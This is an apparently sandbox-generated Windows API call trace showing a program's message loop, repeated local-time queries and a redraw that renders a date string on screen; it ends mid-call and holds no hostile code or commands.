DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0109.157] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x382)) [0109.157] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x382)) [0109.157] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0109.168] TranslateMessage (lpMsg=0x2347a14) returned 0 [0109.168] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0109.168] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x38d)) [0109.168] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x38d)) [0109.168] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0109.185] TranslateMessage (lpMsg=0x2347a14) returned 0 [0109.185] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0109.185] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x39e)) [0109.185] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x39e)) [0109.185] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0109.213] TranslateMessage (lpMsg=0x2347a14) returned 0 [0109.213] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0109.213] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x3ba)) [0109.213] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x3ba)) [0109.213] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0109.224] TranslateMessage (lpMsg=0x2347a14) returned 0 [0109.224] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0109.224] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x3c5)) [0109.224] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x3c5)) [0109.224] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0109.231] TranslateMessage (lpMsg=0x2347a14) returned 0 [0109.231] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0109.231] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x3cc)) [0109.231] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x3cc)) [0109.231] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0109.248] TranslateMessage (lpMsg=0x2347a14) returned 0 [0109.248] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0109.248] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x3dd)) [0109.248] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x3dd)) [0109.248] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0109.262] TranslateMessage (lpMsg=0x2347a14) returned 0 [0109.262] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0109.262] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x3)) [0109.262] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x4)) [0109.262] InvalidateRect (hWnd=0x402fa, lpRect=0x19f5c0, bErase=0) returned 1 [0109.263] GetDC (hWnd=0x0) returned 0xa0100d0 [0109.263] MoveToEx (in: hdc=0xa0100d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0109.263] SelectObject (hdc=0xa0100d0, h=0x280a099b) returned 0x18a0048 [0109.263] GetSysColor (nIndex=8) returned 0x0 [0109.263] SetTextColor (hdc=0xa0100d0, color=0x0) returned 0x0 [0109.263] SelectObject (hdc=0xa0100d0, h=0x193009a9) returned 0x1b00017 [0109.263] SetROP2 (hdc=0xa0100d0, rop2=13) returned 13 [0109.263] UnrealizeObject (h=0x2d10099f) returned 1 [0109.263] SelectObject (hdc=0xa0100d0, h=0x2d10099f) returned 0x1900010 [0109.263] SetBkColor (hdc=0xa0100d0, color=0xffffff) returned 0xffffff [0109.263] SetBkMode (hdc=0xa0100d0, mode=2) returned 2 [0109.263] DrawTextA (in: hdc=0xa0100d0, lpchText="8/5/2022 - 1:49:39 PM", cchText=21, lprc=0x19f5bd, format=0x440 | out: lpchText="8/5/2022 - 1:49:39 PM", lprc=0x19f5bd) returned 13 [0109.264] SelectObject (hdc=0xa0100d0, h=0x1b00017) returned 0x193009a9 [0109.264] SelectObject (hdc=0xa0100d0, h=0x1900015) returned 0x2d10099f [0109.264] SelectObject (hdc=0xa0100d0, h=0x18a0048) returned 0x280a099b [0109.264] GetCurrentPositionEx (in: hdc=0xa0100d0, lppt=0x19f5a8 | out: lppt=0x19f5a8) returned 1 [0109.264] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0109.264] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0109.301] TranslateMessage (lpMsg=0x2347a14) returned 0 [0109.301] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0109.301] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x2b)) [0109.302] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x2b)) [0109.302] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0109.308] TranslateMessage (lpMsg=0x2347a14) returned 0 [0109.308] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0109.308] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x32)) [0109.309] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x32)) [0109.309] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0109.331] TranslateMessage (lpMsg=0x2347a14) returned 0 [0109.331] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0109.331] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x48)) [0109.331] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x48)) [0109.331] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0109.372] TranslateMessage (lpMsg=0x2347a14) returned 0 [0109.372] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0109.372] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x71)) [0109.372] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x72)) [0109.372] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0109.390] TranslateMessage (lpMsg=0x2347a14) returned 0 [0109.390] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0109.390] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x83)) [0109.391] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x84)) [0109.391] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0109.401] TranslateMessage (lpMsg=0x2347a14) returned 0 [0109.401] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0109.401] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x8e)) [0109.401] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x8e)) [0109.401] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0109.469] TranslateMessage (lpMsg=0x2347a14) returned 0 [0109.469] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0109.469] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0xd2)) [0109.469] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0xd2)) [0109.469] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0109.472] TranslateMessage (lpMsg=0x2347a14) returned 0 [0109.473] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0109.473] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0xd6)) [0109.473] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0xd6)) [0109.473] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0109.483] TranslateMessage (lpMsg=0x2347a14) returned 0 [0109.484] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0109.484] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0xe1)) [0109.484] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0xe1)) [0109.484] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0109.504] TranslateMessage (lpMsg=0x2347a14) returned 0 [0109.504] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0109.504] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0xf5)) [0109.504] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0xf5)) [0109.504] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0109.515] TranslateMessage (lpMsg=0x2347a14) returned 0 [0109.515] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0109.515] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x100)) [0109.518] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x103)) [0109.518] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0109.539] TranslateMessage (lpMsg=0x2347a14) returned 0 [0109.539] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0109.539] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x118)) [0109.539] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x118)) [0109.539] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0109.548] TranslateMessage (lpMsg=0x2347a14) returned 0 [0109.548] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0109.548] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x121)) [0109.548] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x121)) [0109.548] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0109.559] TranslateMessage (lpMsg=0x2347a14) returned 0 [0109.559] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0109.559] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x12c)) [0109.559] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x12c)) [0109.559] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0109.580] TranslateMessage (lpMsg=0x2347a14) returned 0 [0109.580] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0109.580] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x141)) [0109.580] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x141)) [0109.580] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0109.591] TranslateMessage (lpMsg=0x2347a14) returned 0 [0109.591] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0109.591] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x14c)) [0109.591] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x14c)) [0109.591] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0109.612] TranslateMessage (lpMsg=0x2347a14) returned 0 [0109.612] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0109.612] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x161)) [0109.612] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x161)) [0109.612] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0109.657] TranslateMessage (lpMsg=0x2347a14) returned 0 [0109.657] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0109.657] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x18e)) [0109.658] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x18f)) [0109.658] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0109.675] TranslateMessage (lpMsg=0x2347a14) returned 0 [0109.675] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0109.675] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x1a0)) [0109.675] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x1a0)) [0109.675] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0109.685] TranslateMessage (lpMsg=0x2347a14) returned 0 [0109.685] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0109.685] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x1aa)) [0109.685] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x1aa)) [0109.685] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0109.706] TranslateMessage (lpMsg=0x2347a14) returned 0 [0109.706] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0109.706] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x1bf)) [0109.706] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x1bf)) [0109.706] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0109.716] TranslateMessage (lpMsg=0x2347a14) returned 0 [0109.716] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0109.716] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x1c9)) [0109.716] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x1c9)) [0109.716] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0109.738] TranslateMessage (lpMsg=0x2347a14) returned 0 [0109.738] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0109.738] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x1df)) [0109.738] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x1df)) [0109.738] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0109.747] TranslateMessage (lpMsg=0x2347a14) returned 0 [0109.747] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0109.747] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x1e8)) [0109.747] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x1e8)) [0109.747] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0109.764] TranslateMessage (lpMsg=0x2347a14) returned 0 [0109.764] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0109.764] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x1f9)) [0109.765] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x1fa)) [0109.765] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0109.790] TranslateMessage (lpMsg=0x2347a14) returned 0 [0109.790] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0109.790] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x213)) [0109.790] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x213)) [0109.791] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0109.800] TranslateMessage (lpMsg=0x2347a14) returned 0 [0109.800] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0109.801] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x21e)) [0109.801] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, 